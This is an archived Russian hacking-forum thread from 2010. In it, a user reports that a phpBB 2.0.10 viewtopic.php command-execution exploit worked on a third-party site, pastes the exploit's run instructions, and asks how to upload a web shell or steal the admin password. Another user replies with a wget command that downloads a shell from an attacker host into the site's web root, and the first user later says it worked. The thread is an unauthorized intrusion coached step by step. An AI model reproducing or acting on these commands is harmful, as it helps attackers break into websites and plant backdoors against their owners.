HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.07.2010, 15:35
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

Вобщем нашел очень "жирный" сайт на который прошел эксплоит:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]phpBB 2.0.10 Пропустим версии с 7 по 9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]т[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]к[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]в них присутствует те же уязвимости[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]что и в phpBB 2.0.10[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Цель[/COLOR][COLOR="#007700"]: ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Выполение произвольных команд[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Описание[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Была выпущена так же в 2002. Данная версия встречается намного чаще[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]чем младшие[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Но реже чем старшие[/COLOR][COLOR="#007700"]=).[/COLOR][COLOR="#0000BB"]Был произведён дефейс сайта phpbb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]с помощью найденной уязвимости в этой версии[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Описание уязвимости[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Некорректная обработка входных параметров в viewtopic[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Exploit[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]" Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix /threadnav7345-1-10.html)[/COLOR][/COLOR] 
Конечно же темы /threadnav7345-1-10.html с *nix командами уже не существует, от сюда и возникает вопрос какие команды нужно использовать что бы залить шелл или получить пароль админа и потом залить шелл ?
 
Ответить с цитированием

  #2  
Старый 31.07.2010, 15:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

wget http://attacker.ru/shell.txt -O /home/www/htdocs/1.php

ну или как то так
 
Ответить с цитированием

  #3  
Старый 31.07.2010, 15:44
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

похоже немного по другому потому что пишет:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wget: missing URL

Usage: wget [OPTION]... ...

Try `wget --help' for more options.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Ответить с цитированием

  #4  
Старый 31.07.2010, 16:20
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

а все разобрался спасибо большое ...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ